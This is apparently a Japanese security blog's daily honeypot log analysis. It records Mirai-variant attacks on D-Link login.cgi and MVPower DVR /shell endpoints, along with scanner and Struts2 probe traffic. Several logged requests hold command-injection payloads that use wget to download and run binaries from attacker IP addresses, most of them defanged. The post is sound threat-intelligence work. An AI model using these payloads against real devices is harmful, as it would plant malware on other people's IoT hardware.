S-Owl

S(ecurity)Owl

トップ > honeypot > ハニーポットのログ分析(2018/08/26)

ハニーポットのログ分析(2018/08/26)

honeypot

WOWhoneypotの2018/08/26(運用83日目)の簡易分析です。
本日の総アクセス件数は 47件です。以下が全アクセスログです。

28 2018-08-26 GET /
7 2018-08-26 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://209.141.33[.]86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$
4 2018-08-26 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://148.72.176[.]78/ngynx%20-O%20-%3E%20/tmp/ngynx;sh%20/tmp/ngynx%27$
1 2018-08-26 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://176.32.32[.]156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
1 2018-08-26 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://128.199.251[.]119/t.php%27$
1 2018-08-26 GET /shell?cd+/tmp;cd+/var;wget+hxxp://199.195.254[.]118/jaws+-O+lwodo;sh%+lwodo;rm+-rf+lwodo
1 2018-08-26 HEAD /redirect.php
1 2018-08-26 HEAD /
1 2018-08-26 GET /index.php
1 2018-08-26 GET /index.action
1 2018-08-26 GET hxxp://www.msftncsi.com/ncsi.txt

 

phpMyAdmin関連(1件)と/へのアクセスを除外したアクセス数です。

7 2018-08-26 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://209.141.33[.]86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$
4 2018-08-26 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://148.72.176[.]78/ngynx%20-O%20-%3E%20/tmp/ngynx;sh%20/tmp/ngynx%27$
1 2018-08-26 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://176.32.32[.]156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
1 2018-08-26 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://128.199.251[.]119/t.php%27$
1 2018-08-26 GET /shell?cd+/tmp;cd+/var;wget+hxxp://199.195.254[.]118/jaws+-O+lwodo;sh%+lwodo;rm+-rf+lwodo
1 2018-08-26 HEAD /redirect.php
1 2018-08-26 GET /index.action
1 2018-08-26 GET hxxp://www.msftncsi.com/ncsi.txt 

本日もMirai亜種が多いです。 D-Linkの脆弱性を突く攻撃(/login.cgi?cli=…)のUser-Agentを抜き出すと以下となります。

5 User-Agent: Hakai/2.0
4 User-Agent: Shinka/1.0
3 User-Agent: Gemini/2.0
1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36

一つだけUAのパターンが異なるもののアクセスログは以下です。

GET /login.cgi?cli=aa%20aa%27;wget%20http://128.199.251[.]119/t.php%27$ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36

このペイロードのダウロード先を調査しました。
https://urlscan.io/result/db63079d-de49-492f-9d4c-f3e6a54d9bac

t.phpにアクセスすると/pma.phpへリダイレクトされ404が返されます。また、使っているインフラとしてはUbuntu,Apache,phpであることがわかります。
これまで、Shinka、HakaiはCentOS上に立てたApacheであることが多かったため、攻撃者が別なのではないか、と推測しています。

その他、Mirai亜種はMVPower DVRのシェルコマンド実行の脆弱性をついた攻撃「/shell?…」が1件来ていました。

初めて見る(気がする)「HEAD /redirect.php」のアクセスは以下になります。恐らくWebをスキャンするプロジェクトなのでしょう。

HEAD /redirect.php HTTP/1.0
User-Agent: www.probethenet.com scanner
Content-Type: text/html

「GET /index.action」はStruts2脆弱性S2-045が存在するかを調査するツールのようです。

 

本日のハンティングログは以下です。全てIoT機器を狙ったMirai亜種によるものです。

7 2018-08-26 wget hxxp://209.141.33.[8]6/d
4 2018-08-26 wget hxxp://148.72.176[.]78/ngynx
1 2018-08-26 wget+hxxp://199.195.254[.]118/jaws
1 2018-08-26 wget hxxp://176.32.32[.]156/bin
1 2018-08-26 wget hxxp://128.199.251[.]119/t.php

以上です。